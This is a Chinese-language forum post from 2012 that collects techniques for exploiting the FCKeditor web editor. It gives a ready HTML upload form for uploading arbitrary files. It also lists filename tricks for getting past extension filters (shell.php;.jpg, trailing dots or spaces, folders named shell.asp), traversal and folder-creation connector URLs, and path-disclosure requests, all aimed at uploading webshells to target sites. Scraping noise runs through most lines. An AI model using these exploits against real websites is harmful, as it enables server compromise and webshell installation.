|
Fckeditor漏洞利用总结 查看编辑器版本
7 p' d' ~* T, g6 J( w1 p4 nFCKeditor/_whatsnew.html: B# p1 U q% o1 C
————————————————————————————————————————————————————————————— 2. Version 2.2 版本
6 \% m9 s! ?7 c% S7 vApache+linux 环境下在上传文件后面加个.突破!测试通过。
9 a( P4 y$ @) W1 t————————————————————————————————————————————————————————————— 3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
, L% O+ a0 Q' s! E M<form id="frmUpload" enctype="multipart/form-data"- F- }3 c0 |; H5 d& F/ ?: f7 L+ M$ N* ?
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>+ u8 V8 N+ D p( u3 r
<input type="file" name="NewFile" size="50"><br>' J$ `5 ?" j8 ~6 g. R% s6 m
<input id="btnUpload" type="submit" value="Upload">
& U/ D9 }8 o( ~. |; A- a5 F6 c</form>
, w# t6 t; K2 S# ~- Q————————————————————————————————————————————————————————————— 4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
* `) z0 H# W" r. x2 l 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。# X( r6 [: n: W/ G' v3 @
4.1:提交shell.php+空格绕过
( R C0 C" i& W7 ~不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。4 C0 d3 S/ ]; ~& v+ p% ~ t7 E4 v
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。3 T; l# T4 i# W) q$ L
————————————————————————————————————————————————————————————— 5. 突破建立文件夹2 C! C( e7 n2 |! i9 u3 g
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684( T: G2 ~+ a# w( Z& T! c
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
L. |" k5 X3 p& C+ `; U6 X# I8 z————————————————————————————————————————————————————————————— 6. FCKeditor 中test 文件的上传地址
2 r) J" b& U! ` A( X2 wFCKeditor/editor/filemanager/browser/default/connectors/test.html
! x$ U9 g0 ?! ~3 \" R9 cFCKeditor/editor/filemanager/upload/test.html
$ x$ U& }9 O% A$ L2 }! d8 J( FFCKeditor/editor/filemanager/connectors/test.html
% Q# K. Y( |& |/ _6 E1 h8 bFCKeditor/editor/filemanager/connectors/uploadtest.html
+ n9 J6 M& {+ g& J" {—————————————————————————————————————————————————————————————+ F f3 V ~8 Q9 \
7.常用上传地址8 R* o- q; v; F% y
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
0 h; E8 [) M7 A* M. g- k3 }FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp" f3 G, d' \) y5 y+ n: ~9 \7 ^4 e
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)4 K2 P x- J m, ]* B; l
JSP 版:
1 z% C" o. j0 P9 n4 ?, r7 B, @. |6 HFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp* e' O0 T( L7 M
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
" O- I$ d0 U- }% A f7 n/ h件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
! D7 c7 E6 b2 D M————————————————————————————————————————————————————————————— 8.其他上传地址7 L! W. x0 Z% k, L& w, [
FCKeditor/_samples/default.html$ R5 I0 {$ g$ W+ P, L$ }
FCKeditor/_samples/asp/sample01.asp* O5 P5 M/ V+ B |( W
FCKeditor/_samples/asp/sample02.asp
7 }) {1 d M# `2 RFCKeditor/_samples/asp/sample03.asp
8 n4 `% \' i1 OFCKeditor/_samples/asp/sample04.asp! q6 V* U& @$ U. T% w- }0 E6 q- @
一般很多站点都已删除_samples 目录,可以试试。
2 E: r9 C& b5 M* r5 s/ |FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
( @& q6 c: ?1 k5 Q# E8 h6 p————————————————————————————————————————————————————————————— 9.列目录漏洞也可助找上传地址
5 U' N0 _% b$ [" R. d" w4 `Version 2.4.1 测试通过/ a: f- K; b- k9 W* P
修改CurrentFolder 参数使用 ../../来进入不同的目录0 N4 e; |- h ~; k4 Y) L; W
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
1 I2 E" G' u% ~9 y2 V# o根据返回的XML 信息可以查看网站所有的目录。
# K3 U% _2 A, B% d% C5 p2 B- DFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F" K% }3 h: G+ j( w
也可以直接浏览盘符:
- p5 M1 x* i2 N5 |9 ~ d! eJSP 版本:% M8 ]/ D0 o% j
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
( u6 \* H3 k/ q: \/ A————————————————————————————————————————————————————————————— 10.爆路径漏洞
/ j, a3 ~ m# Q- W: {FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp1 v+ x5 |. c: v- A+ z4 ]
————————————————————————————————————————————————————————————— 11. FCKeditor 被动限制策略所导致的过滤不严问题
) Z& q+ J0 B$ n) W; | 影响版本: FCKeditor x.x <= FCKeditor v2.4.3
# W$ r* T( ]( A7 r脆弱描述:
\& e, l4 b" |FCKeditor v2.4.3 中File 类别默认拒绝上传类型:4 V7 u8 f3 x% ?3 c
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm5 Z- o4 a7 i4 a- t$ R
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
) e$ a, @8 e# w* S 而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。3 K9 ?! F$ u; B1 H3 z+ ~+ I' s b1 B
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg! | 
发表于 2012-9-5 20:23:31
收藏
支持
反对